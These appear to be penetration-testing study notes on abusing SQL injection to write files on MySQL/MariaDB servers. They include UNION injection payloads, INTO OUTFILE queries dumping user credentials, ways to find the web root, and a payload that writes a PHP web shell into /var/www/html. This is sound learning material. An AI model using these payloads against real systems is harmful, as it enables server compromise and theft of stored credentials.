Skip to content
  1. User with FILE privilege enabled
  2. MySQL global secure_file_priv variable not enabled
  3. Write access to the location we want to write to on the back-end server

We know how to find FILE privs from Reading files

secure_file_priv

  • secure_file_priv tells us where we can read/write files.
    • if empty, we can read/write on the entire system
    • if certain dir is set, we can read/write to that dir only.
    • NULL means we cannot read/write

  • DEFAULT LOCATIONS for secure_file_priv:

    • MariaDB - empty by default
    • MySQL - /var/lib/mysql-files 
    • Even worse, some modern configurations default to NULL, meaning that we cannot read/write files anywhere within the system. 
      SHOW VARIABLES LIKE 'secure_file_priv';

      SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

  • IN' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"#

    • shows that the value is empty and hence we can read/write to the entire system

WRITE

  • https://mariadb.com/kb/en/select-into-outfile/
  • SELECT * from users INTO OUTFILE '/tmp/credentials';
    • then if we cat /tmp/credentials , the output will be there
  • SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
    • send strings to a file
  • the owner of these files will be the user running mysql. usually named mysql

Web Root information

Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use load_file to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf, Nginx's configuration at /etc/nginx/nginx.conf, or IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using this wordlist for Linux or this wordlist for Windows. Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.

Writing a web-shell

  • IN' union select "",'<update from image>', "", "" into outfile '/var/www/html/shell.php'#
  • https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/